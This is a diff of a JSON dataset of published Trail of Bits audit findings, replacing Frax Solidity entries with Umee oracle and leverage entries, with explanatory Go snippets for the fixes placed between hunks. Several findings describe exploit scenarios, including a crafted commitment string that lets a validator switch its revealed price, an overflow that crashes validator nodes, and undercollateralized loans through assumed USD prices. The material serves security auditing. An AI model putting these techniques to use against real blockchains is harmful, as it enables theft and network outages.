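        _, err := strconv.ParseUint(arg, 10, 8)
        fmt.Println(err) // strconv.ParseUint: parsing "300": value out of range
    }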
- "title": "12. Incorrect default price tolerance in CCFrax1to1AMM ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The price_tolerance state variable of the CCFrax1to1AMM contract is set to 50,000, which, when using the fixed-point scaling factor of 10^6, corresponds to 0.05. This is inconsistent with the variable's inline comment, which indicates the number 5,000, corresponding to 0.005. A price tolerance of 0.05 is probably too high and can lead to unacceptable arbitrage activities; this suggests that price_tolerance should be set to the value indicated in the code comment. uint256 public price_tolerance = 50000 ; // E6. 5000 = .995 to 1.005 Figure 12.1: The price_tolerance state variable ( CCFrax1to1AMM.sol#56 ) Exploit Scenario This issue exacerbates the exploit scenario presented in issue TOB-FRSOL-008 . Given that scenario, but with a price tolerance of 50,000, Alice is able to gain $5,459 through arbitrage. A higher price tolerance leads to higher arbitrage profits. Recommendations Short term, set the price tolerance to 5,000 both in the code and on the deployed contract. Long term, ensure that comments are in sync with the code and that constants are correct.", + "title": "2. Rounding of the standard deviation value may deprive voters of rewards ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The ExchangeRateBallot.StandardDeviation function calculates the standard deviation of the exchange rates submitted by voters. To do this, it converts the variance into a float, prints its square root to a string, and parses it into a Dec value (figure 2.1). This logic rounds down the standard deviation value, which is likely unexpected behavior; if the exchange rate is within the reward spread value, voters may not receive the rewards they are owed. The rounding operation is performed by the fmt.Sprintf(\"%f\", floatNum) function, which, as shown in Appendix C , may cut off decimal places from the square root value. // StandardDeviation returns the standard deviation by the power of the ExchangeRateVote. func (pb ExchangeRateBallot) StandardDeviation() (sdk.Dec, error ) { // (...) variance := sum.QuoInt64( int64 ( len (pb))) floatNum, err := strconv.ParseFloat(variance.String(), 64 ) if err != nil { /* (...) */ } floatNum = math.Sqrt(floatNum) standardDeviation, err := sdk.NewDecFromStr(fmt.Sprintf( \"%f\" , floatNum)) if err != nil { /* (...) */ } return standardDeviation, nil } Figure 2.1: Inaccurate float conversions ( umee/x/oracle/types/ballot.go#L89-L97 ) Exploit Scenario A voter reports a price that should be within the reward spread. However, because the standard deviation value is rounded, the price is not within the reward spread, and the voter does not receive a reward. Recommendations Short term, have the ExchangeRateBallot.StandardDeviation function use the Dec.ApproxSqrt method to calculate the standard deviation instead of parsing the variance into a float, calculating the square root, and parsing the formatted float back into a value of the Dec type. That way, users who vote for exchange rates close to the correct reward spread will receive the rewards they are owed. Figure 2.2 shows a patch for this issue. diff --git a/x/oracle/types/ballot.go b/x/oracle/types/ballot.go index 6b201c2..9f6b579 100644 --- a/x/oracle/types/ballot.go +++ b/x/oracle/types/ballot.go @@ -1,12 +1,8 @@ package types import ( - \"fmt\" - \"math\" - \"sort\" - \"strconv\" sdk \"github.com/cosmos/cosmos-sdk/types\" + \"sort\" ) // VoteForTally is a convenience wrapper to reduce redundant lookup cost.
@@ -88,13 +84,8 @@ func (pb ExchangeRateBallot) StandardDeviation() (sdk.Dec, error ) { variance := sum.QuoInt64( int64 ( len (pb))) - floatNum, err := strconv.ParseFloat(variance.String(), 64 ) - if err != nil { - return sdk.ZeroDec(), err - } + standardDeviation, err := variance.ApproxSqrt() - floatNum = math.Sqrt(floatNum) - standardDeviation, err := sdk.NewDecFromStr(fmt.Sprintf( \"%f\" , floatNum)) if err != nil { return sdk.ZeroDec(), err } diff --git a/x/oracle/types/ballot_test.go b/x/oracle/types/ballot_test.go index 0cd09d8..0dd1f1a 100644 --- a/x/oracle/types/ballot_test.go +++ b/x/oracle/types/ballot_test.go @@ -177,21 +177,21 @@ func TestPBStandardDeviation(t *testing.T) { }, { [] float64 { 1.0 , 2.0 , 10.0 , 100000.0 }, [] int64 { 1 , 1 , 100 , 1 }, [] bool { true , true , true , true }, - sdk.NewDecWithPrec( 4999500036300 , OracleDecPrecision), + sdk.MustNewDecFromStr( \"49995.000362536252310906\" ), }, { // Adding fake validator doesn't change outcome [] float64 { 1.0 , 2.0 , 10.0 , 100000.0 , 10000000000 }, [] int64 { 1 , 1 , 100 , 1 , 10000 }, [] bool { true , true , true , true , false }, - sdk.NewDecWithPrec( 447213595075100600 , OracleDecPrecision), + sdk.MustNewDecFromStr( \"4472135950.751005519905537611\" ), }, { // Tie votes [] float64 { 1.0 , 2.0 , 3.0 , 4.0 }, [] int64 { 1 , 100 , 100 , 1 }, [] bool { true , true , true , true }, - sdk.NewDecWithPrec( 122474500 , OracleDecPrecision), + sdk.MustNewDecFromStr( \"1.224744871391589049\" ), }, { // No votes Figure 2.2: A patch for this issue", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Low" + "Difficulty: High" ] }, {
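The precision loss the patch removes is easy to demonstrate in isolation; this standalone Go snippet shows how the %f verb truncates a square root to six decimal places:

    package main

    import (
        "fmt"
        "math"
    )

    func main() {
        sqrt := math.Sqrt(2) // 1.4142135623730951...

        // %f uses a fixed default precision of six digits after the
        // decimal point, silently discarding the rest of the value.
        fmt.Printf("%f\n", sqrt) // 1.414214
        fmt.Println(sqrt)        // 1.4142135623730951
    }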
- "title": "13. Significant code duplication ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "Significant code duplication exists throughout the codebase. Duplicate code can lead to incomplete fixes or inconsistent behavior (e.g., because the code is modified in one location but not in all). For example, the FraxUnifiedFarmTemplate.sol and StakingRewardsMultiGauge.sol files both contain a retroCatchUp function. As seen in figure 13.1, the functions are almost identical. Left ( contracts/Staking/FraxUnifiedFarmTemplate.sol#L463-L490 ): // If the period expired, renew it function retroCatchUp() internal { // Pull in rewards from the rewards distributor rewards_distributor.distributeReward(address(this)); // Ensure the provided reward amount is not more than the balance in the contract. // This keeps the reward rate in the right range, preventing overflows due to // very high values of rewardRate in the earned and rewardsPerToken functions; // Reward + leftover must be less than 2^256 / 10^18 to avoid overflow. uint256 num_periods_elapsed = uint256(block.timestamp - periodFinish) / rewardsDuration; // Floor division to the nearest period // Make sure there are enough tokens to renew the reward period for (uint256 i = 0; i < rewardTokens.length; i++){ require((rewardRates(i) * rewardsDuration * (num_periods_elapsed + 1)) <= ERC20(rewardTokens[i]).balanceOf(address(this)), string(abi.encodePacked(\"Not enough reward tokens available: \", rewardTokens[i]))); } // uint256 old_lastUpdateTime = lastUpdateTime; // uint256 new_lastUpdateTime = block.timestamp; // lastUpdateTime = periodFinish; periodFinish = periodFinish + ((num_periods_elapsed + 1) * rewardsDuration); // Update the rewards and time _updateStoredRewardsAndTime(); // Update the fraxPerLPStored fraxPerLPStored = fraxPerLPToken(); } Right ( contracts/Staking/StakingRewardsMultiGauge.sol#L637-L662 ): // If the period expired, renew it function retroCatchUp() internal { // Pull in rewards from the rewards distributor rewards_distributor.distributeReward(address(this)); // Ensure the provided reward amount is not more than the balance in the contract. // This keeps the reward rate in the right range, preventing overflows due to // very high values of rewardRate in the earned and rewardsPerToken functions; // Reward + leftover must be less than 2^256 / 10^18 to avoid overflow. uint256 num_periods_elapsed = uint256(block.timestamp.sub(periodFinish)) / rewardsDuration; // Floor division to the nearest period // Make sure there are enough tokens to renew the reward period for (uint256 i = 0; i < rewardTokens.length; i++){ require(rewardRates(i).mul(rewardsDuration).mul(num_periods_elapsed + 1) <= ERC20(rewardTokens[i]).balanceOf(address(this)), string(abi.encodePacked(\"Not enough reward tokens available: \", rewardTokens[i]))); } // uint256 old_lastUpdateTime = lastUpdateTime; // uint256 new_lastUpdateTime = block.timestamp; // lastUpdateTime = periodFinish; periodFinish = periodFinish.add((num_periods_elapsed.add(1)).mul(rewardsDuration)); // Update the rewards and time _updateStoredRewardsAndTime(); emit RewardsPeriodRenewed(address(stakingToken)); } Figure 13.1: The two nearly identical retroCatchUp functions Exploit Scenario Alice, a Frax Finance developer, is asked to fix a bug in the retroCatchUp function. Alice updates one instance of the function, but not both. Eve discovers a copy of the function in which the bug is not fixed and exploits the bug. Recommendations Short term, perform a comprehensive code review and identify pieces of code that are semantically similar. Factor out those pieces of code into separate functions where it makes sense to do so. This will reduce the risk that those pieces of code diverge after the code is updated. Long term, adopt code practices that discourage code duplication. Doing so will help to prevent this problem from recurring.", + "title": "3. Vulnerabilities in exchange rate commitment scheme ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The Umee oracle implements a commitment scheme in which users vote on new exchange rates by submitting \"pre-vote\" and \"vote\" messages. However, vulnerabilities in this scheme could allow an attacker to (1) predict the prices to which other voters have committed and (2) send two prices for an asset in a pre-vote message hash and then submit one of the prices in the vote message. (Note that predicting other prices would likely require the attacker to make some correct guesses about those prices.) The first issue is that the random salt used in the scheme is too short. The salt is generated as two random bytes (figure 3.1) and is later hex-encoded and limited to four bytes (figure 3.2). As a result, an attacker could pre-compute the pre-vote commitment hash for every salt value (and thus recover the expected exchange rate), effectively violating the hiding property of the scheme.
salt, err := GenerateSalt( 2 ) Figure 3.1: The salt-generation code ( umee/price-feeder/oracle/oracle.go#L358 ) if len (msg.Salt) > 4 || len (msg.Salt) < 1 { return sdkerrors.Wrap(ErrInvalidSaltLength, \"salt length must be [1, 4]\" ) } Figure 3.2: The salt-validation logic ( umee/x/oracle/types/msgs.go#L148-L150 ) The second issue is the lack of proper salt validation, which would guarantee sufficient domain separation between a random salt and the exchange rate when the commitment hash is calculated. The domain separator string consists of a colon character, as shown in figure 3.3. However, there is no verification of whether the salt is a hex-encoded string or whether it contains the separator character; only the length of the salt is validated. This bug could allow an attacker to reveal an exchange rate other than the one the attacker had committed to, violating the binding property of the scheme. func GetAggregateVoteHash(salt string , exchangeRatesStr string , voter sdk.ValAddress) AggregateVoteHash { hash := tmhash.NewTruncated() sourceStr := fmt.Sprintf( \"%s:%s:%s\" , salt, exchangeRatesStr, voter.String() ) Figure 3.3: The generation of a commitment hash ( umee/x/oracle/types/hash.go#L23-L25 ) The last vulnerability in the scheme is the insufficient validation of exchange rate strings: the strings undergo unnecessary trimming, and the code checks only that len(denomAmountStr) is less than two (figure 3.4), rather than performing a stricter check to confirm that it is not equal to two. This could allow an attacker to exploit the second bug described in this finding. func ParseExchangeRateTuples(tuplesStr string ) (ExchangeRateTuples, error ) { tuplesStr = strings.TrimSpace(tuplesStr) if len (tuplesStr) == 0 { return nil , nil } tupleStrs := strings.Split(tuplesStr, \",\" ) // (...) for i, tupleStr := range tupleStrs { denomAmountStr := strings.Split(tupleStr, \":\" ) if len (denomAmountStr) < 2 { return nil , fmt.Errorf( \"invalid exchange rate %s\" , tupleStr) } } // (...) } Figure 3.4: The code that parses exchange rates ( umee/x/oracle/types/vote.go#L72-L86 ) Exploit Scenario The maximum salt length of two is increased. During a subsequent pre-voting period, a malicious validator submits the following commitment hash: sha256(\"whatever:UMEE:123:␣UMEE:456,USDC:789:addr\") . (Note that ␣ represents a normal whitespace character.) Then, during the voting period, the attacker waits for all other validators to reveal their exchange rates and salts and then chooses the UMEE price that he will reveal ( 123 or 456 ). In this way, the attacker can manipulate the exchange rate to his advantage. If the attacker chooses to reveal a price of 123 , the following will occur: 1. The salt will be set to whatever . 2. The attacker will submit an exchange rate string of UMEE:123:␣UMEE:456,USDC:789 . 3. The value will be hashed as sha256( whatever : UMEE:123:␣UMEE:456,USDC:789 : addr) . 4. The exchange rate will then be parsed as 123/789 (UMEE/USDC). Note that ␣UMEE = 456 (with its leading whitespace character) will be ignored. This is because of the insufficient validation of exchange rate strings (as described above) and the fact that only the first and second items of denomAmountStr are used. (See the screenshot in Appendix D). If the attacker chooses to reveal a price of 456 , the following will occur: 1. The salt will be set to whatever:UMEE:123 . 2. The exchange rate string will be set to ␣UMEE:456,USDC:789 . 3. The value will be hashed as sha256( whatever:UMEE:123 : ␣UMEE:456,USDC:789 : addr) . 4.
Because exchange rate strings undergo space trimming, the exchange rate will be parsed as 456/789 (UMEE/USDC). Recommendations Short term, take the following steps: Increase the salt length to prevent brute-force attacks. To ensure a security level of X bits, use salts of 2*X random bits. For example, for a 128-bit security level, use salts of 256 bits (32 bytes). Ensure domain separation by implementing validation of a salt's format and accepting only hex-encoded strings. Implement stricter validation of exchange rates by ensuring that every exchange rate substring contains exactly one colon character and checking whether all denominations are included in the list of accepted denominations; also avoid trimming whitespace at the beginning of the parsing process. Long term, consider replacing the truncated SHA-256 hash function with a SHA-512/256 or HMAC-SHA256 function. This will increase the level of security from 80 bits to about 128, which will help prevent collision and length extension attacks.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Undetermined" + "Severity: Low", + "Difficulty: Medium" ] }, {
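The short- and long-term recommendations combine naturally. The Go sketch below is an illustration under those recommendations only (it is not Umee's GenerateSalt or GetAggregateVoteHash, and the voter address is a placeholder): it derives a 32-byte hex salt from crypto/rand and binds the vote with HMAC-SHA256, so the salt is the MAC key rather than a colon-delimited prefix, removing the ambiguous salt boundary that the exploit scenario relies on:

    package main

    import (
        "crypto/hmac"
        "crypto/rand"
        "crypto/sha256"
        "encoding/hex"
        "fmt"
    )

    // generateSalt returns n random bytes, hex-encoded. For a ~128-bit
    // security level, the recommendation above calls for 32 bytes.
    func generateSalt(n int) (string, error) {
        b := make([]byte, n)
        if _, err := rand.Read(b); err != nil {
            return "", err
        }
        return hex.EncodeToString(b), nil
    }

    // commit binds the exchange-rate string and voter address under the
    // salt. Keying the HMAC with the salt means no crafted salt can shift
    // the boundary between salt and exchange rates in the committed input.
    func commit(salt, exchangeRates, voter string) []byte {
        mac := hmac.New(sha256.New, []byte(salt))
        mac.Write([]byte(exchangeRates + ":" + voter))
        return mac.Sum(nil)
    }

    func main() {
        salt, err := generateSalt(32)
        if err != nil {
            panic(err)
        }
        // The voter address below is a hypothetical placeholder.
        fmt.Printf("%x\n", commit(salt, "UMEE:123,USDC:789", "umeevaloper1..."))
    }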
- "title": "14. StakingRewardsMultiGauge.recoverERC20 allows token managers to steal rewards ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The recoverERC20 function in the StakingRewardsMultiGauge contract allows token managers to steal rewards. This violates conventions established by other Frax Solidity contracts in which recoverERC20 can be called only by the contract owner. The relevant code appears in figure 14.1. The recoverERC20 function checks whether the caller is a token manager and, if so, sends him the requested amount of the token he manages. Convention states that this function should be callable only by the contract owner. Moreover, its purpose is typically to recover tokens unrelated to the contract. // Added to support recovering LP Rewards and other mistaken tokens from other systems to be distributed to holders function recoverERC20 ( address tokenAddress , uint256 tokenAmount ) external onlyTknMgrs ( tokenAddress ) { // Check if the desired token is a reward token bool isRewardToken = false ; for ( uint256 i = 0 ; i < rewardTokens.length; i++){ if (rewardTokens[i] == tokenAddress) { isRewardToken = true ; break ; } } // Only the reward managers can take back their reward tokens if (isRewardToken && rewardManagers[tokenAddress] == msg.sender ){ ERC20 (tokenAddress). transfer ( msg.sender , tokenAmount); emit Recovered ( msg.sender , tokenAddress, tokenAmount); return ; } Figure 14.1: contracts/Staking/StakingRewardsMultiGauge.sol#L798-L814 For comparison, consider the CCFrax1to1AMM contract's recoverERC20 function. It is callable only by the contract owner and specifically disallows transferring tokens used by the contract. function recoverERC20 ( address tokenAddress , uint256 tokenAmount ) external onlyByOwner { require (!is_swap_token[tokenAddress], \"Cannot withdraw swap tokens\" ); TransferHelper. safeTransfer ( address (tokenAddress), msg.sender , tokenAmount); } Figure 14.2: contracts/Misc_AMOs/__CROSSCHAIN/Moonriver/CCFrax1to1AMM.sol#L340-L344 Exploit Scenario Eve tricks Frax Finance into making her a token manager for the StakingRewardsMultiGauge contract. When the contract's token balance is high, Eve withdraws the tokens and vanishes. Recommendations Short term, eliminate the token manager's ability to call recoverERC20 . This will bring recoverERC20 in line with established conventions regarding the function's purpose and usage. Long term, regularly review all uses of contract modifiers, such as onlyTknMgrs . Doing so will help to expose bugs like the one described here.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: High" + "Severity: High", + "Difficulty: Medium" ] }, { + "title": "4. Validators can crash other nodes by triggering an integer overflow ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "By submitting a large exchange rate value, a validator can trigger an integer overflow that will cause a Go panic and a node crash. The Umee oracle code checks that each exchange rate submitted by a validator is a positive value with a bit size of less than or equal to 256 (figures 4.1 and 4.2). The StandardDeviation method iterates over all exchange rates and adds up their squares (figure 4.3) but does not check for an overflow. A large exchange rate value will cause the StandardDeviation method to panic when performing multiplication or addition . func ParseExchangeRateTuples(tuplesStr string ) (ExchangeRateTuples, error ) { // (...) for i, tupleStr := range tupleStrs { // (...) decCoin, err := sdk.NewDecFromStr(denomAmountStr[ 1 ]) // (...) if !decCoin.IsPositive() { return nil , types.ErrInvalidOraclePrice } Figure 4.1: The check of whether the exchange rate values are positive ( umee/x/oracle/types/vote.go#L71-L96 ) func (msg MsgAggregateExchangeRateVote) ValidateBasic() error { // (...) exchangeRates, err := ParseExchangeRateTuples(msg.ExchangeRates) if err != nil { /* (...) - returns wrapped error */ } for _, exchangeRate := range exchangeRates { // check overflow bit length if exchangeRate.ExchangeRate.BigInt().BitLen() > 255 + sdk.DecimalPrecisionBits // (...) - returns error Figure 4.2: The check of the exchange rate values' bit lengths ( umee/x/oracle/types/msgs.go#L136-L146 ) sum := sdk.ZeroDec() for _, v := range pb { deviation := v.ExchangeRate.Sub(median) sum = sum.Add(deviation.Mul(deviation)) } Figure 4.3: Part of the StandardDeviation method ( umee/x/oracle/types/ballot.go#L83-L87 ) The StandardDeviation method is called by the Tally function, which is called in the EndBlocker function. This means that an attacker could trigger an overflow remotely in another validator node. Exploit Scenario A malicious validator commits to and then sends a large UMEE exchange rate value. As a result, all validator nodes crash, and the Umee blockchain network stops working. Recommendations Short term, implement overflow checks for all arithmetic operations involving exchange rates. Long term, use fuzzing to ensure that no other parts of the code are vulnerable to overflows.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: High" + "Severity: High", + "Difficulty: Medium" ] }, {
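A minimal form of the recommended overflow check can be sketched in Go with big.Int bit-length guards (an illustration only; cosmos-sdk's Dec type wraps big.Int internally, but these helper names and the exact bit cap are assumptions, not Umee APIs):

    package main

    import (
        "errors"
        "fmt"
        "math/big"
    )

    // maxBits is an assumed cap mirroring sdk.Dec's 256-bit range plus
    // headroom for the decimal precision bits.
    const maxBits = 256 + 60

    // checkedMul multiplies a*b but returns an error, instead of
    // panicking, when the product would exceed the permitted bit length.
    // Running such a guard inside Tally/StandardDeviation turns a
    // node-crashing panic into a rejected vote.
    func checkedMul(a, b *big.Int) (*big.Int, error) {
        p := new(big.Int).Mul(a, b)
        if p.BitLen() > maxBits {
            return nil, errors.New("exchange rate product overflows")
        }
        return p, nil
    }

    func main() {
        huge := new(big.Int).Lsh(big.NewInt(1), 200) // 2^200
        if _, err := checkedMul(huge, huge); err != nil {
            fmt.Println(err) // exchange rate product overflows
        }
    }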
- "title": "15. Convex_AMO_V2 custodian can withdraw rewards ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The Convex_AMO_V2 custodian can withdraw rewards. This violates conventions established by other Frax Solidity contracts in which the custodian is only able to pause operations. The relevant code appears in figure 15.1. The withdrawRewards function is callable by the contract owner, governance, or the custodian. This provides significantly more power to the custodian than other contracts in the Frax Solidity repository. function withdrawRewards ( uint256 crv_amt , uint256 cvx_amt , uint256 cvxCRV_amt , uint256 fxs_amt ) external onlyByOwnGovCust { if (crv_amt > 0 ) TransferHelper.safeTransfer(crv_address, msg.sender , crv_amt); if (cvx_amt > 0 ) TransferHelper.safeTransfer( address (cvx), msg.sender , cvx_amt); if (cvxCRV_amt > 0 ) TransferHelper.safeTransfer(cvx_crv_address, msg.sender , cvxCRV_amt); if (fxs_amt > 0 ) TransferHelper.safeTransfer(fxs_address, msg.sender , fxs_amt); } Figure 15.1: contracts/Misc_AMOs/Convex_AMO_V2.sol#L425-L435 Exploit Scenario Eve tricks Frax Finance into making her the custodian for the Convex_AMO_V2 contract. When the unclaimed rewards are high, Eve withdraws them and vanishes. Recommendations Short term, determine whether the Convex_AMO_V2 custodian requires the ability to withdraw rewards. If so, document this as a security concern. This will help users to understand the risks associated with depositing funds into the Convex_AMO_V2 contract. Long term, implement a mechanism that allows rewards to be distributed without requiring the intervention of an intermediary. Reducing human involvement will increase users' overall confidence in the system.", + "title": "5. The repayValue variable is not used after being modified ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The Keeper.LiquidateBorrow function uses the local variable repayValue to calculate the repayment.Amount value. If repayValue is greater than or equal to maxRepayValue , it is changed to that value. However, the repayValue variable is not used again after being modified, which suggests that the modification could be a bug or a code quality issue. func (k Keeper) LiquidateBorrow( // (...) // repayment cannot exceed borrowed value * close factor maxRepayValue := borrowValue.Mul(closeFactor) repayValue, err := k.TokenValue(ctx, repayment) if err != nil { return sdk.ZeroInt(), sdk.ZeroInt(), err } if repayValue.GTE(maxRepayValue) { // repayment *= (maxRepayValue / repayValue) repayment.Amount = repayment.Amount.ToDec().Mul(maxRepayValue).Quo( repayValue ).TruncateInt() repayValue = maxRepayValue } // (...) Figure 5.1: umee/x/leverage/keeper/keeper.go#L446-L456 We identified this issue by running CodeQL's DeadStoreOfLocal.ql query. Recommendations Short term, review and fix the dead assignment to the repayValue variable in the Keeper.LiquidateBorrow function, which is not used after being modified, to prevent related issues in the future.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Undetermined", "Difficulty: High" ] }, { - "title": "16. The FXS1559 documentation is inaccurate ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The FXS1559 documentation states that excess FRAX tokens are exchanged for FXS tokens, and the FXS tokens are then burned. However, the reality is that those FXS tokens are redistributed to veFXS holders. More specifically, the documentation states the following: Specifically, every time interval t, FXS1559 calculates the excess value above the CR [collateral ratio] and mints FRAX in proportion to the collateral ratio against the value. It then uses the newly minted currency to purchase FXS on FRAX-FXS AMM pairs and burn it. However, in the FXS1559_AMO_V3 contract, the number of FXS tokens that are burned is a tunable parameter (see figures 16.1 and 16.2). The parameter defaults to, and is currently, 0 (according to Etherscan). burn_fraction = 0 ; // Give all to veFXS initially Figure 16.1: contracts/Misc_AMOs/FXS1559_AMO_V3.sol#L87 // Calculate the amount to burn vs give to the yield distributor uint256 amt_to_burn = fxs_received.
mul (burn_fraction). div (PRICE_PRECISION); uint256 amt_to_yield_distributor = fxs_received. sub (amt_to_burn); // Burn some of the FXS burnFXS (amt_to_burn); // Give the rest to the yield distributor FXS. approve ( address (yieldDistributor), amt_to_yield_distributor); yieldDistributor. notifyRewardAmount (amt_to_yield_distributor); Figure 16.2: contracts/Misc_AMOs/FXS1559_AMO_V3.sol#L159-L168 Exploit Scenario Frax Finance is publicly shamed for claiming that FXS is deflationary when it is not. Confidence in FRAX declines, and it loses its peg as a result. Recommendations Short term, correct the documentation to indicate that some proportion of FXS tokens may be distributed to veFXS holders. This will help users to form correct expectations regarding the operation of the protocol. Long term, consider whether FXS tokens need to be redistributed. The documentation makes a compelling argument for burning FXS tokens. Adjusting the code to match the documentation might be a better way of resolving this discrepancy.", + "title": "6. Inconsistent error checks in GetSigners methods ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The GetSigners methods in the x/oracle and x/leverage modules exhibit different error-handling behavior when parsing strings into validator or account addresses. The GetSigners methods in the x/oracle module always panic upon an error, while the methods in the x/leverage module explicitly ignore parsing errors. Figures 6.1 and 6.2 show examples of the GetSigners methods in those modules. We set the severity of this finding to informational because message addresses parsed in the x/leverage module's GetSigners methods are also validated in the ValidateBasic methods. As a result, the issue is not currently exploitable. // GetSigners implements sdk.Msg func (msg MsgDelegateFeedConsent) GetSigners() []sdk.AccAddress { operator, err := sdk.ValAddressFromBech32(msg.Operator) if err != nil { panic (err) } return []sdk.AccAddress{sdk.AccAddress(operator)} } Figure 6.1: umee/x/oracle/types/msgs.go#L174-L182 func (msg *MsgLendAsset) GetSigners() []sdk.AccAddress { lender, _ := sdk.AccAddressFromBech32(msg.GetLender()) return []sdk.AccAddress{lender} } Figure 6.2: umee/x/leverage/types/tx.go#L30-L33 Recommendations Short term, use a consistent error-handling process in the x/oracle and x/leverage modules' GetSigners methods. The x/leverage module's GetSigners functions should handle errors in the same way that the x/oracle methods do: by panicking.", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Undetermined" + "Difficulty: High" ] }, { - "title": "17. Univ3LiquidityAMO defaults the price of collateral to $1 ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The Uniswap V3 AMOs default to a price of $1 unless an oracle is set, and it is not clear whether an oracle is or will be set. If the contract lacks an oracle, the contract will return the number of collateral units instead of the price of collateral, meaning that it will value each unit of collateral at $1 instead of the correct price. While this may not be an issue for stablecoins, this pattern is error-prone and unclear. It could introduce errors in the global collateral value of FRAX since the protocol may underestimate (or overestimate) the value of the collateral if the price is above (or below) $1. col_bal_e18 is the balance, not the price, of the tokens.
- "title": "17. Univ3LiquidityAMO defaults the price of collateral to $1 ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The Uniswap V3 AMOs default to a price of $1 unless an oracle is set, and it is not clear whether an oracle is or will be set. If the contract lacks an oracle, the contract will return the number of collateral units instead of the price of collateral, meaning that it will value each unit of collateral at $1 instead of the correct price. While this may not be an issue for stablecoins, this pattern is error-prone and unclear. It could introduce errors in the global collateral value of FRAX since the protocol may underestimate (or overestimate) the value of the collateral if the price is above (or below) $1. col_bal_e18 is the balance, not the price, of the tokens. When collatDolarValue is called without an oracle, the contract falls back to valuing each token at $1. function freeColDolVal() public view returns ( uint256 ) { uint256 value_tally_e18 = 0 ; for ( uint i = 0 ; i < collateral_addresses.length; i++){ ERC20 thisCollateral = ERC20(collateral_addresses[i]); uint256 missing_decs = uint256 ( 18 ).sub(thisCollateral.decimals()); uint256 col_bal_e18 = thisCollateral.balanceOf( address ( this )).mul( 10 ** missing_decs); uint256 col_usd_value_e18 = collatDolarValue(oracles[collateral_addresses[i]], col_bal_e18); value_tally_e18 = value_tally_e18.add(col_usd_value_e18); } return value_tally_e18; } Figure 17.1: contracts/Misc_AMOs/UniV3LiquidityAMO_V2.sol#L161-L171 function collatDolarValue (OracleLike oracle, uint256 balance ) public view returns ( uint256 ) { if ( address (oracle) == address ( 0 )) return balance; return balance.mul(oracle.read()).div( 1 ether); } Figure 17.2: contracts/Misc_AMOs/UniV3LiquidityAMO_V2.sol#L174-L177 Exploit Scenario The value of a collateral token is $0.50. Instead of incentivizing recollateralization, the protocol indicates that it is adequately collateralized (or overcollateralized). However, the price of the collateral token is half the $1 default value, and the protocol needs to respond to the insufficient collateral backing FRAX. Recommendations Short term, integrate the Uniswap V3 AMOs properly with an oracle, and remove the hard-coded price assumptions. Long term, review and test the effect of each pricing function on the global collateral value and ensure that the protocol responds correctly to changes in collateralization.", + "title": "7. Incorrect price assumption in the GetExchangeRateBase function ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "If the denominator string passed to the GetExchangeRateBase function contains the substring USD (figure 7.1), the function returns 1 , presumably to indicate that the denominator is a stablecoin. If the system accepts an ERC20 token that is not a stablecoin but has a name containing USD, the system will report an incorrect exchange rate for the asset, which may enable token theft. Moreover, the price of an actual USD stablecoin may vary from USD 1. Therefore, if a stablecoin used as collateral for a loan loses its peg, the loan may not be liquidated correctly. // GetExchangeRateBase gets the consensus exchange rate of an asset // in the base denom (e.g. ATOM -> uatom) func (k Keeper) GetExchangeRateBase(ctx sdk.Context, denom string ) (sdk.Dec, error ) { if strings.Contains(strings.ToUpper(denom), types.USDDenom) { return sdk.OneDec(), nil } // (...) Figure 7.1: umee/x/oracle/keeper/keeper.go#L89-L94 func (k Keeper) TokenPrice(ctx sdk.Context, denom string ) (sdk.Dec, error ) { if !k.IsAcceptedToken(ctx, denom) { return sdk.ZeroDec(), sdkerrors.Wrap(types.ErrInvalidAsset, denom) } price, err := k.oracleKeeper.GetExchangeRateBase(ctx, denom) // (...) return price, nil } Figure 7.2: umee/x/leverage/keeper/oracle.go#L12-L34 Exploit Scenario Umee adds the cUSDC ERC20 token as an accepted token. Upon its addition, its price is USD 0.02, not USD 1. However, because of the incorrect price assumption, the system sets its price to USD 1. This enables an attacker to create an undercollateralized loan and to draw funds from the system. Exploit Scenario 2 The price of a stablecoin drops significantly. However, the x/leverage module fails to detect the change and reports the price as USD 1. This enables an attacker to create an undercollateralized loan and to draw funds from the system. Recommendations Short term, remove the condition that causes the GetExchangeRateBase function to return a price of USD 1 for any asset whose name contains USD.", "labels": [ "Trail of Bits", "Severity: High", @@ -2532,19 +5290,19 @@ ] }, {
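A sketch of the short-term fix for finding 7, with the USD shortcut removed. The GetExchangeRate store lookup used here is an assumption about the keeper's internals; the exact helper may differ.

// GetExchangeRateBase without the USD-substring special case: every denom,
// stablecoin or not, must resolve to an actual committed exchange rate.
func (k Keeper) GetExchangeRateBase(ctx sdk.Context, denom string) (sdk.Dec, error) {
    // the strings.Contains(strings.ToUpper(denom), types.USDDenom) branch
    // from figure 7.1 is deleted, per the recommendation above
    rate, err := k.GetExchangeRate(ctx, denom) // assumed store lookup
    if err != nil {
        return sdk.ZeroDec(), err
    }
    return rate, nil // conversion to the base denom omitted for brevity
}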
